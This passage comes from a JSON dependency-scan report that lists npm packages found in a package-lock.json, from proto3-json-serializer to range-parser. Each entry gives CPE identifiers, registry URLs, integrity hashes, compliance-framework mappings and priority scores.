"cpe:2.3:a:proto3_json_serializer:proto3_json_serializer:2.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:proto3-json:proto3-json-serializer:2.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:proto3-json:proto3_json_serializer:2.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:proto3_json:proto3-json-serializer:2.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:proto3_json:proto3_json_serializer:2.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:proto3:proto3-json-serializer:2.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:proto3:proto3_json_serializer:2.0.2:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/proto3-json-serializer@2.0.2", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/proto3-json-serializer/-/proto3-json-serializer-2.0.2.tgz", "integrity": "sha512-SAzp/O4Yh02jGdRc+uIrGoe87dkN/XtwxfZ4ZyafJHymd79ozp5VG5nyZ7ygqPM5+cpLDjjGnYFUkngonyDPOQ==", "dependencies": { "protobufjs": "^7.2.5" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "f337eadf0901e415", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: protobufjs 7.5.6", "title": "protobufjs 7.5.6", "description": "Package discovered: protobufjs 7.5.6", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "a5b5323abf9aae9f", "name": "protobufjs", "version": "7.5.6", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "BSD-3-Clause", "spdxExpression": "BSD-3-Clause", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:protobufjs_project:protobufjs:7.5.6:*:*:*:*:node.js:*:*", "source": "nvd-cpe-dictionary" } ], "purl": "pkg:npm/protobufjs@7.5.6", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/protobufjs/-/protobufjs-7.5.6.tgz", "integrity": "sha512-M71sTMB146U3u0di3yup8iM+zv8yPRNQVr1KK4tyBitl3qFvEGucq/rGDRShD2rsJhtN02RJaJ7j5X5hmy8SJg==", "dependencies": { "@protobufjs/aspromise": "^1.1.2", "@protobufjs/base64": "^1.1.2", "@protobufjs/codegen": "^2.0.5", "@protobufjs/eventemitter": "^1.1.0", "@protobufjs/fetch": "^1.1.0", "@protobufjs/float": "^1.0.2", "@protobufjs/inquire": "^1.1.1", "@protobufjs/path": "^1.1.2", "@protobufjs/pool": "^1.1.0", "@protobufjs/utf8": "^1.1.1", "@types/node": ">=13.7.0", "long": "^5.0.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "d4455e8054d4e780", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: proxy-addr 2.0.7", "title": "proxy-addr 2.0.7", "description": "Package discovered: proxy-addr 2.0.7", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "ce10aea6db36304a", "name": "proxy-addr", "version": "2.0.7", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:proxy-addr:proxy-addr:2.0.7:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:proxy-addr:proxy_addr:2.0.7:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:proxy_addr:proxy-addr:2.0.7:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:proxy_addr:proxy_addr:2.0.7:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:proxy:proxy-addr:2.0.7:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:proxy:proxy_addr:2.0.7:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/proxy-addr@2.0.7", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/proxy-addr/-/proxy-addr-2.0.7.tgz", "integrity": "sha512-llQsMLSUDUPT44jdrU/O37qlnifitDP+ZwrmmZcoSKyLKvtZxpyV0n2/bD/N4tBAAZ/gJEdZU7KMraoK1+XYAg==", "dependencies": { "forwarded": "0.2.0", "ipaddr.js": "1.9.1" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "4788b4003cbe678a", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: proxy-from-env 2.1.0", "title": "proxy-from-env 2.1.0", "description": "Package discovered: proxy-from-env 2.1.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "d0670890e90b35a8", "name": "proxy-from-env", "version": "2.1.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:proxy-from-env:proxy-from-env:2.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:proxy-from-env:proxy_from_env:2.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:proxy_from_env:proxy-from-env:2.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:proxy_from_env:proxy_from_env:2.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:proxy-from:proxy-from-env:2.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:proxy-from:proxy_from_env:2.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:proxy_from:proxy-from-env:2.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:proxy_from:proxy_from_env:2.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:proxy:proxy-from-env:2.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:proxy:proxy_from_env:2.1.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/proxy-from-env@2.1.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/proxy-from-env/-/proxy-from-env-2.1.0.tgz", "integrity": "sha512-cJ+oHTW1VAEa8cJslgmUZrc+sjRKgAKl3Zyse6+PV38hZe/V6Z14TbCuXcan9F9ghlz4QrFr2c92TNF82UkYHA==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "6d2187ed4d7bb00d", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: qrcode 1.5.4", "title": "qrcode 1.5.4", "description": "Package discovered: qrcode 1.5.4", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "9616afcfad81bbcd", "name": "qrcode", "version": "1.5.4", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:qrcode:qrcode:1.5.4:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/qrcode@1.5.4", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/qrcode/-/qrcode-1.5.4.tgz", "integrity": "sha512-1ca71Zgiu6ORjHqFBDpnSMTR2ReToX4l1Au1VFLyVeBTFavzQnv5JxMFr3ukHVKpSrSA2MCk0lNJSykjUfz7Zg==", "dependencies": { "dijkstrajs": "^1.0.1", "pngjs": "^5.0.0", "yargs": "^15.3.1" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "cd93e60074e9daeb", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: qs 6.14.2", "title": "qs 6.14.2", "description": "Package discovered: qs 6.14.2", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "baa7b01807110a4c", "name": "qs", "version": "6.14.2", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "BSD-3-Clause", "spdxExpression": "BSD-3-Clause", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:qs_project:qs:6.14.2:*:*:*:*:node.js:*:*", "source": "nvd-cpe-dictionary" } ], "purl": "pkg:npm/qs@6.14.2", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/qs/-/qs-6.14.2.tgz", "integrity": "sha512-V/yCWTTF7VJ9hIh18Ugr2zhJMP01MY7c5kh4J870L7imm6/DIzBsNLTXzMwUA3yZ5b/KBqLx8Kp3uRvd7xSe3Q==", "dependencies": { "side-channel": "^1.1.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "4d4da368c4cb9e85", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: qs 6.15.1", "title": "qs 6.15.1", "description": "Package discovered: qs 6.15.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "994fc27bb4c175c9", "name": "qs", "version": "6.15.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "BSD-3-Clause", "spdxExpression": "BSD-3-Clause", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:qs_project:qs:6.15.1:*:*:*:*:node.js:*:*", "source": "nvd-cpe-dictionary" } ], "purl": "pkg:npm/qs@6.15.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/qs/-/qs-6.15.1.tgz", "integrity": "sha512-6YHEFRL9mfgcAvql/XhwTvf5jKcOiiupt2FiJxHkiX1z4j7WL8J/jRHYLluORvc1XxB5rV20KoeK00gVJamspg==", "dependencies": { "side-channel": "^1.1.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "53a30fbc709808bd", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: queue 6.0.2", "title": "queue 6.0.2", "description": "Package discovered: queue 6.0.2", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "3d2cabf593c9f69a", "name": "queue", "version": "6.0.2", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:queue:queue:6.0.2:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/queue@6.0.2", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/queue/-/queue-6.0.2.tgz", "integrity": "sha512-iHZWu+q3IdFZFX36ro/lKBkSvfkztY5Y7HMiPlOUjhupPcG2JMfst2KKEpu5XndviX/3UhFbRngUPNKtgvtZiA==", "dependencies": { "inherits": "~2.0.3" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "ef5b9014e52d743a", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: queue-microtask 1.2.3", "title": "queue-microtask 1.2.3", "description": "Package discovered: queue-microtask 1.2.3", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "254ae16d84fc4780", "name": "queue-microtask", "version": "1.2.3", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:queue-microtask:queue-microtask:1.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:queue-microtask:queue_microtask:1.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:queue_microtask:queue-microtask:1.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:queue_microtask:queue_microtask:1.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:queue:queue-microtask:1.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:queue:queue_microtask:1.2.3:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/queue-microtask@1.2.3", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/queue-microtask/-/queue-microtask-1.2.3.tgz", "integrity": "sha512-NuaNSa6flKT5JaSYQzJok04JzTL1CA6aGhv5rfLW3PgqA+M2ChpZQnAC8h8i4ZFkBS8X5RqkDBHA7r4hej3K9A==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "cbdbab233debac3e", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: range-parser 1.2.1", "title": "range-parser 1.2.1", "description": "Package discovered: range-parser 1.2.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "4bcca27d3d8ccfdd", "name": "range-parser", "version": "1.2.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:range-parser:range-parser:1.2.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:range-parser:range_parser:1.2.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:range_parser:range-parser:1.2.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:range_parser:range_parser:1.2.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": 